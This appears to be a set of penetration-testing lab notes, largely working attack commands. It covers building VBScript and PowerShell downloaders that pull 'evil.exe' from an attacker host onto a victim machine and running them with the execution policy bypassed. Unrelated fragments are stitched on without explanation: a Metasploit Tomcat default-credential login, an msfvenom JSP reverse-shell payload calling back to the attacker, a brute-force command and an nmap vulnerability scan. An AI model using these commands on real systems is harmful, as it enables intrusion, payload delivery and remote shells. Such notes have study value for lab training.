Scripting engines such as VBScript (in Windows XP, 2003) and PowerShell (in Windows 7, 2008, and above) can both download files to our victim machine. The following set of non-interactive echo commands, when pasted into a remote shell, writes out a VBS script that acts as a simple HTTP downloader (works correctly only on 32-bit Windows versions!).

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Now, we can serve files on our own web server, and download them to the victim machine with ease:
C:\Users\jacco>cscript wget.vbs http://10.11.0.112/evil.exe evil.exe

An even simpler example, for downloading files on machines that have PowerShell installed, is shown below.

C:\Users\jacco> echo $storageDir = $pwd > wget.ps1
C:\Users\jacco> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\Users\jacco> echo $url = "http://10.11.0.112/evil.exe" >>wget.ps1
C:\Users\jacco> echo $file = "new-exploit.exe" >>wget.ps1
C:\Users\jacco> echo $webclient.DownloadFile($url,$file) >>wget.ps1

Now, we can use PowerShell to run the script and download our file:

C:\Users\jacco> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1


msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 10.11.x.x:8080 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.112 LPORT=443 -f war > shell.war
root@kali:~/pwk# python tomcat.py -v  bf -U UFILE -P PFILE /manager/html 10.11.1.x
root@kali:/usr/share/nmap/scripts# nmap -sV --script vulners 192.168.178.25
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-12 05:01 EDT
Nmap scan report for 192.168.178.25
Host is up (0.00041s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 5.1
|_http-server-header: Microsoft-IIS/5.1
| vulners: 
| cpe:/a:microsoft:iis:5.1: 
| CVE-2008-1446 9.0 https://vulners.com/cve/CVE-2008-1446
| CVE-2009-1535 7.6 https://vulners.com/cve/CVE-2009-1535
| CVE-2010-2731 6.8 https://vulners.com/cve/CVE-2010-2731
| CVE-2011-5279 6.4 https://vulners.com/cve/CVE-2011-5279
| CVE-2009-4444 6.0 https://vulners.com/cve/CVE-2009-4444
|_ CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
MAC Address: 08:00:27:7F:DA:07 (Oracle VirtualBox virtual NIC)
Service Info: Host: xppro; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.06 seconds
